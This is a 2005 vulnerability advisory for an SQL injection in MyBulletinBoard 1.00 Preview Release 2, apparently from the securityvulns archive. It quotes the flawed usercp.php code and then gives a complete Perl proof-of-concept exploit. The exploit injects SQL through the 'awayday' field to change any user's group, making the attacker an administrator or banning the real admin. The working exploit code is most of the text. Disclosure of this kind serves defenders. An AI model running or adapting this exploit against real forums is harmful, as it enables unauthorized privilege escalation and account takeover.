SQL-Injection in MyBulletinBoard allows attacker to become a board admin.

2005-10-27T00:00:00
ID SECURITYVULNS:DOC:10053
Type securityvulns
Reporter Securityvulns
Modified 2005-10-27T00:00:00

Description

Vendor: www.mybboard.com Version: 1.00 Preview Release 2, RC4 and mayb prior. Script: usercp.php Code: > if($mybb->input['away'] == "yes" && $mybb->settings['allowaway'] !=
> "no") > { > [...] > $returndate =
> $mybb->input['awayday']."-".$mybb->input['awaymonth']."-".$mybb->input['awayyear']; > [...] > $newprofile = array( > "website" =>
> addslashes(htmlspecialchars($mybb->input['website'])), > "icq" => intval($mybb->input['icq']), > "aim" => addslashes(htmlspecialchars($mybb->input['aim'])), > "yahoo" =>
> addslashes(htmlspecialchars($mybb->input['yahoo'])), > "msn" => addslashes(htmlspecialchars($mybb->input['msn'])), > "birthday" => $bday, > "away" => $away, > "awaydate" => $awaydate, > "returndate" => $returndate, // <--- not checked (bday
> too, but anyway) > "awayreason" =>
> addslashes(htmlspecialchars($mybb->input['awayreason'])) > ); > [...] > $db->update_query(TABLE_PREFIX."users", $newprofile,
> "uid='".$mybb->user['uid']."'"); So: Attacker can replace "awayday" param by some SQL code and change any
field in _users table. Changing "usergroup" for his "uid" to 4 makes him an admin. To use
this bug attacker have to be a registered/awayting_activation user.

Proof of concept: (For PR2 only) --<-->--<-->--<-->--<-->--<-->--[START]--<-->--<-->--<-->--<-->--<-->--

!/usr/bin/perl

MyBB Preview Release 2 SQL-Injection PoC ExPlOiT

------------------------------------------------

To use this you have to be registered member on

a target.

------------------------------------------------

Glossary:

[MYBBUSER] - name of the field in cookie;

[YOUR_ID] - your uid :)

[ID] - victim uid

Available groups:

1 - Unregistered / Not Logged In

2 - Registered

3 - Super Moderators

4 - Administrators

5 - Awayting Activation

6 - Moderators

7 - Banned

------------------------------------------------

Examples:

1) TROUBLE --> U need an admin privileges.

USAGE --> mybbpr2.pl -u [MYBBUSER] -i

[YOUR_ID] -g 4 server /mybb/

2) TROUBLE --> U need to ban real admin.

USAGE --> mybbpr2.pl -u [MYBBUSER] -i

[ID] -g 7 server /mybb/

use IO::Socket;

$tmp=0;

while($tmp<@ARGV) { if($ARGV[$tmp] eq "-u") { $mbuser=$ARGV[$tmp+1]; $tmp++; } if($ARGV[$tmp] eq "-i") { $id=$ARGV[$tmp+1]; $tmp++; } if($ARGV[$tmp] eq "-g") { $ugr=$ARGV[$tmp+1]; $tmp++; } if($ARGV[$tmp] eq "-h") { &f_help(); } $tmp++; }

$target=$ARGV[@ARGV-2]; $path =$ARGV[@ARGV-1];

if(!$mbuser || !$id || !$ugr) { &f_die("Some options aren't specified"); } print "\r\n Attacking http://$target\r\n";

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$target",
PeerPort => "80") || &f_die("Can't connect to $target"); $str="bday1=&bday2=&bday3=&website=&fid3=Undisclosed&fid1=&fid2=&usertitle=&icq=&aim=&msn=&yahoo=&away=yes&awayreason=Hacking+The+World&awayday=1-1-2009%27%2C+usergroup=%27$ugr%27+WHERE+uid=%27$id%27+%2F%2A&awaymonth=1&awayyear=2009&action=do_profile&regsubmit=Update+Profile";

print $sock "POST $path/usercp.php HTTP/1.1\nHost: $target\nAccept:
/\nCookie: mybbuser=$mbuser\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length:
".length($str)."\n\n$str\n"; while(<$sock>) { if (/Thank you/i) { print "\r\n Looks like successfully exploited\r\n
Just check it.\r\n"; exit(0)} } print "\r\n Looks like exploit failed :[\r\n";

----------------------------------

S u B r O u T i N e

----------------------------------

sub f_help() { print q( Usage: mybbpr2.pl <OPTIONS> SERVER PATH Options: -u USERKEY mybbuser field from cookie. -i UID User's uid. (Change group 4 this user) -g GROUP New usergroup. (1-7) -h Displays this help. ); exit(-1); }

'

sub f_die($) { print "\r\nERROR: $_[0]\r\n"; exit(-1); } --<-->--<-->--<-->--<-->--<-->--[EoF]--<-->--<-->--<-->--<-->--<-->--

Found: 1-3 sept 2005. Don't remember. Updated package is available (i hope).

ByE.